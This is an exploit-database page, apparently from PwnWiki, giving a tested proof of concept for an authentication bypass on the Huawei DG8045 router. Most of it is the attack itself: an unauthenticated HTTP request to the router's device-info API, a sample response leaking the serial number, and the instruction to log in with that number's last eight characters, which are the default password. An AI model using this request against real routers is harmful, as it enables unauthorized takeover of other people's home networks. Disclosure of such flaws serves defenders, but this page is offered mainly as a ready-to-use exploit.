免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
该漏洞已通过验证
本页面的EXP/POC/Payload经测试可用,漏洞已经成功复现。 |
影响版本
Version: dg8045
POC
# Title: Huawei dg8045 - Authentication Bypass # Date: 2020-06-24 # Author: Abdalrahman Gamal # Vendor Homepage: www.huawei.com # Version: dg8045 # Hardware Version: VER.A #POC: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. An attacker can leak the serial number via the web app API like the following: ************************Request************************ GET /api/system/deviceinfo HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.1/ X-Requested-With: XMLHttpRequest Connection: close ************************Response************************ HTTP/1.1 200 OK Cache-Control: no-cache, no-store, max-age=0, must-revalidate X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Date: Thu, 24 Jun 2021 02:07 GMT+2 Connection: Keep-Alive Content-Language: en Content-Type: application/javascript Content-Length: 141 while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/ You can use that serial number last 8 char/digits to login to the router.
免费、自由、人人可编辑的漏洞库--pwnwiki.com